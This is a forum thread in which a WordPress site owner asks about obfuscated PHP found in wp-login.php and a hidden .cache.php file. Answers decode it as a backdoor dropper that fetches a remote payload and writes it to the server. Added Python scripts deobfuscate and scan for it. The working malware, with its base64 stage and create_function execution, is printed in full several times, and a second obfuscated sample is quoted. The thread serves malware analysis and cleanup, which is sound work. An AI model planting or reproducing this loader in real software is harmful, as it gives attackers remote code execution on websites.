Encoded code in wp-login.php (WordPress)

Time: 2016-01-16 12:00:16

Tags: wordpress

Recently, while developing my website with WordPress, I found this code in wp-login.php:
if(isset($_GET["\x6Co\x61\x64b\x65a\x6E"])){$WRdMt=array("NxLWXqPd"=>"\x62a\x73e6\x34_\x64\x65\x63\x6F\x64\x65","SroHZlL"=>"\x6D\x64\x35","FfqaHAg"=>"JGE9J29tbXAzWVJWVmJWMGIwYjE3bHlScWJteDInOyRiPSRfR0VUWydsb2FkYmVhbiddOyRhPXN0cl9yZXBsYWNlKGFycmF5KCRiWzJdLCRiWzRdLCRiWzFdLCRiWzldLCRiWzEwXSwkYls3XSwkYlsxMl0sJGJbMTNdLCRiWzE0XSwkYlswXSwkYlszXSksYXJyYXkoJzgnLCcuJywnOicsJ3QnLCcvJywnLycsJ2gnLCdkJywndCcsJy8nLCduJyksJGEpO2lmKGZpbHRlcl92YXIoJGEsRklMVEVSX1ZBTElEQVRFX1VSTCk9PT1mYWxzZSl7ZWNobyAnaW52YWxpZCc7ZXhpdDt9JGM9J2hwdWhmeXZxZGdrJzskZD1maWxlX2dldF9jb250ZW50cygkYSk7aWYoIXN0cmlzdHIoJGQsJGMpKXskZT1jdXJsX2luaXQoJGEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGUsQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkZSxDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLDEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfVVNFUkFHRU5ULCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMzIuMC4xNzAwLjEwNyBTYWZhcmkvNTM3LjM2Jyk7JGQ9Y3VybF9leGVjKCRlKTtpZihjdXJsX2Vycm5vKCRlKSl7ZWNobyAnRVJST1I6IEN1cmwgRVJST1InO2V4aXQ7fWN1cmxfY2xvc2UoJGUpO2lmKCFzdHJpc3RyKCRkLCRjKSl7ZWNobyAnQ291bGQgbm90IGRsIGZpbGU6ICcuJGE7ZXhpdDt9fSRmPShzdHJwb3MoX19GSUxFX18sJygnKSE9PWZhbHNlP2Rpcm5hbWUoc3Vic3RyKF9fRklMRV9fLDAsc3RycG9zKF9fRklMRV9fLCcoJykpKTpkaXJuYW1lKF9fRklMRV9fKSkuRElSRUNUT1JZX1NFUEFSQVRPUi4nLmNhY2hlLnBocCc7aWYoIWZpbGVfcHV0X2NvbnRlbnRzKCRmLCRkKSl7ZWNobyAnQ291bGQgbm90IENSRUFURSBmaWxlOiAnLiRmO31lbHNle2VjaG8gJ2JlYW46IGh0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS5zdHJfcmVwbGFjZSgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLCcnLCRmKTt9ZXhpdDs=","NQavwLhN"=>"cr\x65\x61t\x65\x5F\x66un\x63ti\x6F\x6E");$UynkeW="\x65\x78\x74\x72\x61\x63\x74";$UynkeW($WRdMt);$CmIoaMog=$NQavwLhN('',$NxLWXqPd($FfqaHAg));$CmIoaMog();}

This code has not caused any problems as far as I can tell, but I do not know how it got inserted into the file. There is also a file, .cache.php, which I found at wp-content/themes/.cache.php; it contains the same code, only larger, and there is a copyright text in it as well. Can anyone tell me what this is? Thanks in advance.

2 answers:

Answer 0 (score: 0)

This is a base64-encoded string with some heavy obfuscation on top. It probably means your site has been hacked. Anyway, let's start decoding.

You can start by decoding the strings in this code (they are hex-encoded ASCII characters). You can also use an online tool such as https://www.unphp.net/. Then you get:

<?  
    if(isset($_GET["loadbean"])){
        $WRdMt=array(
            "NxLWXqPd"=>"base64_decode",
            "SroHZlL"=>"md5",
            "FfqaHAg"=>"JGE9J29tbXAzWVJWVmJWMGIwYjE3bHlScWJteDInOyRiPSRfR0VUWydsb2FkYmVhbiddOyRhPXN0cl9yZXBsYWNlKGFycmF5KCRiWzJdLCRiWzRdLCRiWzFdLCRiWzldLCRiWzEwXSwkYls3XSwkYlsxMl0sJGJbMTNdLCRiWzE0XSwkYlswXSwkYlszXSksYXJyYXkoJzgnLCcuJywnOicsJ3QnLCcvJywnLycsJ2gnLCdkJywndCcsJy8nLCduJyksJGEpO2lmKGZpbHRlcl92YXIoJGEsRklMVEVSX1ZBTElEQVRFX1VSTCk9PT1mYWxzZSl7ZWNobyAnaW52YWxpZCc7ZXhpdDt9JGM9J2hwdWhmeXZxZGdrJzskZD1maWxlX2dldF9jb250ZW50cygkYSk7aWYoIXN0cmlzdHIoJGQsJGMpKXskZT1jdXJsX2luaXQoJGEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGUsQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkZSxDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLDEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfVVNFUkFHRU5ULCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMzIuMC4xNzAwLjEwNyBTYWZhcmkvNTM3LjM2Jyk7JGQ9Y3VybF9leGVjKCRlKTtpZihjdXJsX2Vycm5vKCRlKSl7ZWNobyAnRVJST1I6IEN1cmwgRVJST1InO2V4aXQ7fWN1cmxfY2xvc2UoJGUpO2lmKCFzdHJpc3RyKCRkLCRjKSl7ZWNobyAnQ291bGQgbm90IGRsIGZpbGU6ICcuJGE7ZXhpdDt9fSRmPShzdHJwb3MoX19GSUxFX18sJygnKSE9PWZhbHNlP2Rpcm5hbWUoc3Vic3RyKF9fRklMRV9fLDAsc3RycG9zKF9fRklMRV9fLCcoJykpKTpkaXJuYW1lKF9fRklMRV9fKSkuRElSRUNUT1JZX1NFUEFSQVRPUi4nLmNhY2hlLnBocCc7aWYoIWZpbGVfcHV0X2NvbnRlbnRzKCRmLCRkKSl7ZWNobyAnQ291bGQgbm90IENSRUFURSBmaWxlOiAnLiRmO31lbHNle2VjaG8gJ2JlYW46IGh0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS5zdHJfcmVwbGFjZSgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLCcnLCRmKTt9ZXhpdDs=",
            "NQavwLhN"=>"create_function"
        );
        $UynkeW = "extract";
        $UynkeW($WRdMt);
        $CmIoaMog = $NQavwLhN('',$NxLWXqPd($FfqaHAg));
        $CmIoaMog();
    } 
?>

So this code base64-decodes a string, creates a function from the result and then calls it. You can rename the variables yourself to see exactly what is going on. The base64-encoded code in turn decodes to:

<?
// Stage 2, i.e. what the base64 string decodes to: rebuild a download URL from the
// "loadbean" request parameter, fetch it and drop the result next to this file.
$a = 'ommp3YRVVbV0b0b17lyRqbmx2'; // template: 25 placeholder characters
$b = $_GET['loadbean'];             // the attacker's key; its characters select what gets replaced
// Each listed character of the key is replaced, in this order, by the matching
// character of the second array. Only a key the attacker chose turns the template
// into a valid URL; the key itself never appears in the file.
$a = str_replace(array(
    $b[2],
    $b[4],
    $b[1],
    $b[9],
    $b[10],
    $b[7],
    $b[12],
    $b[13],
    $b[14],
    $b[0],
    $b[3]
), array(
    '8',
    '.',
    ':',
    't',
    '/',
    '/',
    'h',
    'd',
    't',
    '/',
    'n'
), $a);
// Bail out unless the rebuilt string passes PHP's URL filter.
if (filter_var($a, FILTER_VALIDATE_URL) === false) {
    echo 'invalid';
    exit;
}
$c = 'hpuhfyvqdgk'; // marker the downloaded payload is expected to contain
$d = file_get_contents($a);
// Retry with cURL (following redirects, with a spoofed desktop Chrome user agent)
// if the plain fetch did not return a payload carrying the marker.
if (!stristr($d, $c)) {
    $e = curl_init($a);
    curl_setopt($e, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($e, CURLOPT_BINARYTRANSFER, 1);
    curl_setopt($e, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($e, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36');
    $d = curl_exec($e);
    if (curl_errno($e)) {
        echo 'ERROR: Curl ERROR';
        exit;
    }
    curl_close($e);
    if (!stristr($d, $c)) {
        echo 'Could not dl file: ' . $a;
        exit;
    }
}
// Inside a create_function() body, __FILE__ carries a "(line) : runtime-created function"
// suffix; strip it so the payload lands in the same directory as this file, as .cache.php
// (the leading dot keeps it out of a plain directory listing).
$f = (strpos(__FILE__, '(') !== false ? dirname(substr(__FILE__, 0, strpos(__FILE__, '('))) : dirname(__FILE__)) . DIRECTORY_SEPARATOR . '.cache.php';
if (!file_put_contents($f, $d)) {
    echo 'Could not CREATE file: ' . $f;
} else {
    // Report the URL at which the dropped file is now reachable.
    echo 'bean: http://' . $_SERVER['HTTP_HOST'] . str_replace($_SERVER['DOCUMENT_ROOT'], '', $f);
}
exit;
?>

That should get you started on reversing this code (e.g. use PHPStorm or any other PHP IDE to refactor/rename the variables, execute parts of the code to see what they decode to, etc.). Looking at it, I do see some file_put_contents() and file_get_contents() calls, which may well be there to download a file and write it onto your server.
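As an added example (not part of the question or of this answer), the following Python script does the two decoding steps above offline instead of through an online tool: it resolves the \x escapes in the loader's strings, which is all that hides base64_decode, md5, create_function, extract and the "loadbean" parameter name, and then emulates the str_replace() step of the decoded payload to show how the request parameter is turned into a download URL. EXAMPLE_KEY is made up; the real key only ever travelled in the attacker's request and is not on this page, so the URL it produces is illustrative only. looks_like_url() is a rough stand-in for filter_var(FILTER_VALIDATE_URL), not a port of it.

```python
import re

# Strings copied from the loader in the question: PHP double-quoted literals whose
# characters are partly written as \xNN escapes.
HEX_ESCAPED = {
    "request key": r"\x6Co\x61\x64b\x65a\x6E",
    "NxLWXqPd": r"\x62a\x73e6\x34_\x64\x65\x63\x6F\x64\x65",
    "SroHZlL": r"\x6D\x64\x35",
    "NQavwLhN": r"cr\x65\x61t\x65\x5F\x66un\x63ti\x6F\x6E",
    "UynkeW": r"\x65\x78\x74\x72\x61\x63\x74",
}


def php_unescape_hex(s):
    """Resolve \\xNN escapes the way PHP does inside a double-quoted string (1-2 hex digits)."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), s)


def resolve_loader():
    """Map each obfuscated name in the loader to the plain string it really holds."""
    return {name: php_unescape_hex(value) for name, value in HEX_ESCAPED.items()}


# Stage 2, after base64: the fixed template and the eleven (key position -> character)
# substitutions, copied from the decoded payload in the answer above.
TEMPLATE = "ommp3YRVVbV0b0b17lyRqbmx2"
KEY_POSITIONS = [2, 4, 1, 9, 10, 7, 12, 13, 14, 0, 3]
REPLACEMENTS = ["8", ".", ":", "t", "/", "/", "h", "d", "t", "/", "n"]


def rebuild_url(key):
    """Emulate str_replace(array(...), array(...), $a) on the loadbean key.

    PHP applies the pairs one after another over the whole current string. A key
    shorter than 15 characters yields "" for a missing index, and str_replace with
    an empty search string leaves the subject unchanged, so such pairs are skipped.
    """
    out = TEMPLATE
    for pos, rep in zip(KEY_POSITIONS, REPLACEMENTS):
        ch = key[pos] if pos < len(key) else ""
        if ch:
            out = out.replace(ch, rep)
    return out


# A made-up 15-character key (assumption for illustration; the real one is unknown).
EXAMPLE_KEY = "_3_Vb__R_mY_ol2"


def looks_like_url(u):
    """Coarse stand-in for filter_var($a, FILTER_VALIDATE_URL): a scheme plus a host."""
    return re.fullmatch(r"[A-Za-z][A-Za-z0-9+.-]*://[A-Za-z0-9.-]+(/.*)?", u) is not None


if __name__ == "__main__":
    for name, plain in resolve_loader().items():
        print(f"{name:12} -> {plain}")
    url = rebuild_url(EXAMPLE_KEY)
    print(url, looks_like_url(url))
```

Two things worth noticing once the names are resolved: SroHZlL becomes md5 but is never called (dead weight that pads the array), and because none of the eleven replacement characters occur in the template, the sequential str_replace behaves like a simultaneous substitution here, so the key is a plain one-to-one mapping of template characters to URL characters.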

Answer 1 (score: 0)

Same code, but on a single line, found in the WordPress themes directory. What kind of code is this? I cannot delete it: every time I delete it, it restores itself. Any idea what to do?

// This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.

$Kx6p56uAbwra = "7VRLbDY=I4FP5BvRgZTI=AGI=LQgUJGpHwSLKToLwCMazA=PWQ/VATE=XVXWZTY=ZjdnVrXIZ2U=QMN/d+AJY=CNvHHbejM=eBcdDg=P5rPQolFbzg=pZIY0xtYTA=iXWQvrLS+Y/EjxyOnhgiwajg=CMckNDYeDU=paYZJVVMVWKDmMriGWH4aW4QQqDpGqtJRU7emRI2+FjiXkhP2mF6p+gnQzF/qugT01KvIXvgovSEOSxXMpCnGFudzU=TnnhIewYjM=T/BTG=QGbDQ=fVBZdWU=53pZQ4qHcGM=PDMI=MU=dgY87hQ8hdmY=d+HznZSpxzRqXyIWejk=M+hEgWhIcjE=AvremU=8+gDxTASpORhZJlnsjaCaJmbWI=qRkHjHZjk=/1RdzM=54rliMSi+OZsK+A4bhxZH3gdqzYmvjSxrPZjE=AZDk=4ktFXdjDjxOejY=KOYG6VnGTNdsiuLsn+8sjc2I=0/DDC=ETU=5arZL0Wztdzz/wKfdrtatG7zkokH5KTL6RH++INc2M=TI=FAtHdDk=RfY8NnHIpGizdpZ+EMU=jdxWCZjY=HCU+vK1ljO4yZPfAjT8A3ZzA=nejQ=azQXlScDM=的Au/Y6GvmFEtHuN36D2nGnZBYjM=FHdsaAdMdTM=TgtWcmY=6cmM=DC=/iEZ8xdKipyC1jydDE=TDfoQ895AdhJXPpnHs/LRPObjI=CWI=EJE=6mG7e//7tN8eTI=pxJqZMYTY=TEMI=ZQLLdSwZVQ8xg/suZDY=2SYzA=7RiHvJ/F/yZGI=TY=pFpd2I=WM=MY=pqsvOcdSB/AGU=O7YmY=AUeFNvBEzBdzY=bpFRLqFvaDE=PBMI=TI=RMeScGI=EkXK0amM=qajU=AZM=OADI=8hYCL0FGKH787cTM=iaNqaZLUzlRU8IZTQ=BHrwEHbDI=PM8iUNDTPsHM0+CGY=+O1UaZ0ZzAaKQnZ2U=MY=RBZK=MP/5sAqcTk=UW5hqL7yoHH3jlDEY/NR+SYPYTA=1aHmYFYTQ=AfRDTIPHd/Bc2I=DC=3pQ542ZdmU=KPRJC3cTk=OCS+PM+ADY=VI0RdAeTU=8eDQ=4ayhoBZWI=AOWA3PF22RXXxRuXqlb2I=Ya2U=BZI=aQPGq+9VjAJlniTxQXVZmY=UaiKiLgFeWU=Y/ANVctDyATQsU5dMWcTg=WjKKBUXkWttH/1ujja/yK1ZHGKRqBaTQ=fXcGM=DY=mPnlslY2Y=BDY=9cTc=DBDM=aVaK2rlwLJ9++6TlrToXokLZuwDY2Y=9Zjg=WB07AeDg=nGH1ziu+mIAAcxJiX3I73S/TozhO4PH7FgtTXygClUaTY=5MA31BbdP5bQE1kP7XP+AJU=CZM=ztXbGM=qpuHci/9DDQMueDU=hdploBzxH6K5bTI=7tBwaLZFOk+0eDc=eavOwEisHBQ5C7PWkR6KiHNwSXDDhxNqpMNlh+vdVZmI=/XXW/3/DJK=XORsl+银=="; $UkSsk = strrev("edoced_4" . "6esab"); if (isset($_GET[str_rot13("\x71\x62b\x65")]))
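Added example, not from either answer: a small Python scanner for the string tricks used by both samples on this page. normalise_php() undoes \x escapes, "a" . "b" concatenation, strrev(), str_rot13() and inline base64 literals, which is enough to expose what the two snippets really reference: the first resolves to base64_decode, create_function and extract keyed on $_GET["loadbean"], and the second's strrev("edoced_4" . "6esab") is base64_decode while str_rot13("\x71\x62b\x65") is "door", the request parameter it listens on. scan_php_source() flags a file when dangerous names only appear after de-obfuscation or when base64_decode is paired with create_function or eval, and scan_tree() walks a document root including dotfiles, since the copy reported here lived at wp-content/themes/.cache.php. The two sample strings are constructed stand-ins (the loader's real stage 2 is replaced by a short one), not the page's full payloads.

```python
import base64
import codecs
import os
import re

# Regexes for the string tricks used by the two samples on this page: "\x6Co\x61..." hex
# escapes, "edoced_4" . "6esab" concatenation, strrev(), str_rot13(), and a long base64
# literal that is handed to base64_decode.
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")
CONCAT = re.compile(r'"([^"\\]*)"\s*\.\s*"([^"\\]*)"')
STRREV = re.compile(r'strrev\s*\(\s*"([^"\\]*)"\s*\)')
ROT13 = re.compile(r'str_rot13\s*\(\s*"([^"\\]*)"\s*\)')
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{32,}={0,2})"')
REQUEST_KEY = re.compile(r'\$_(?:GET|POST|REQUEST)\s*\[\s*["\']([^"\']*)["\']\s*\]')


def _decode_b64(m):
    """Swap a base64 literal for its plaintext when it decodes to printable text."""
    try:
        text = base64.b64decode(m.group(1), validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return m.group(0)
    if all(c.isprintable() or c in "\r\n\t" for c in text):
        return '"' + text + '"'
    return m.group(0)


def normalise_php(src):
    """Peel the obfuscation layers so the real identifiers appear as plain text."""
    src = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)
    while True:  # "a" . "b" . "c" -> "abc", repeated until nothing changes
        joined = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if joined == src:
            break
        src = joined
    src = STRREV.sub(lambda m: '"' + m.group(1)[::-1] + '"', src)
    src = ROT13.sub(lambda m: '"' + codecs.encode(m.group(1), "rot13") + '"', src)
    return B64_LITERAL.sub(_decode_b64, src)


# Names that make up the fingerprint of this loader family once they are unhidden.
SUSPECT = ("base64_decode", "create_function", "eval", "extract", "strrev", "str_rot13",
           "file_get_contents", "file_put_contents", "curl_exec", "$_GET", "$_POST", "$_REQUEST")


def scan_php_source(src):
    """Report the suspect names a file uses, which were hidden, and the request keys it reads."""
    norm = normalise_php(src)
    hits = [n for n in SUSPECT if n in src or n in norm]
    hidden = [n for n in hits if n not in src]
    keys = sorted(set(REQUEST_KEY.findall(norm)))
    executes_decoded = "base64_decode" in hits and ("create_function" in hits or "eval" in hits)
    return {"hits": hits, "hidden": hidden, "request_keys": keys,
            "suspicious": bool(hidden) or executes_decoded}


def scan_tree(root):
    """Walk a document root, dotfiles included (os.walk does not skip names starting with a dot)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                report = scan_php_source(fh.read())
            if report["suspicious"]:
                findings.append((path, report))
    return findings


# Constructed samples, not the page's full payloads: the head of the first loader with a
# short stand-in stage 2, and the opening line of the second sample.
STAGE2 = b"$u=$_GET['u'];file_put_contents('.cache.php',file_get_contents($u));"
SAMPLE_LOADER = (
    'if(isset($_GET["\\x6Co\\x61\\x64b\\x65a\\x6E"])){$W=array('
    '"N"=>"\\x62a\\x73e6\\x34_\\x64\\x65\\x63\\x6F\\x64\\x65",'
    '"F"=>"' + base64.b64encode(STAGE2).decode() + '",'
    '"Q"=>"cr\\x65\\x61t\\x65\\x5F\\x66un\\x63ti\\x6F\\x6E");'
    '$U="\\x65\\x78\\x74\\x72\\x61\\x63\\x74";$U($W);$C=$Q("",$N($F));$C();}'
)
SAMPLE_DOOR = '$UkSsk = strrev("edoced_4" . "6esab"); if(isset($_GET[str_rot13("\\x71\\x62b\\x65")]))'

if __name__ == "__main__":
    for label, sample in (("wp-login.php loader", SAMPLE_LOADER), ("themes/.cache.php opener", SAMPLE_DOOR)):
        print(label, scan_php_source(sample))
```

Run scan_tree() over the whole document root rather than the one file that was noticed: a file that reappears after deletion, as described in this answer, is usually being rewritten by another copy of the loader, a scheduled task or a still-valid stolen credential, and the request parameter names the scanner reports ("loadbean", "door") are what to look for in the web server's access log to see when and from where the dropper was triggered.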